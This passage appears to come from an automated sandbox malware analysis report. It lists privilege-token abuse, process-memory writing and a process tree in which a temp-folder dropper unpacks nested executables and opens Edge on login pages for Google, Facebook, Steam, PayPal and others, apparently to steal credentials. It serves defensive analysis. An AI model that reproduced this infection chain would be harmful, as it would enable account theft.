| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\143.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2F0C.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\b98529ce274669010251a0048ff10fb9.exe
"C:\Users\Admin\AppData\Local\Temp\b98529ce274669010251a0048ff10fb9.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ty1lD96.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ty1lD96.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LW2uf85.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LW2uf85.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uI1ds80.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uI1ds80.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1go07xH9.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1go07xH9.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x78,0x80,0x14c,0x70,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,2690306889202367742,1970939696536488573,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,2690306889202367742,1970939696536488573,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,14261802836894432204,17272348062068197580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14261802836894432204,17272348062068197580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,3921952360257209032,6578769962926773547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,3921952360257209032,6578769962926773547,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x108,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13830320178860476583,13455786851214449276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,6963761902398481772,1336715240410684328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffee2ed46f8,0x7ffee2ed4708,0x7ffee2ed4718
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2IX3959.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2IX3959.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7NA21Vg.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6328 -ip 6328
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6328 -s 540
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe ff572ff7ed834b19ba83d5804a7426e8 Jj2QSc4RPkCnobB0vYsT2Q.0.1.0.0.0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,9165552324035528985,12555647722042234515,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
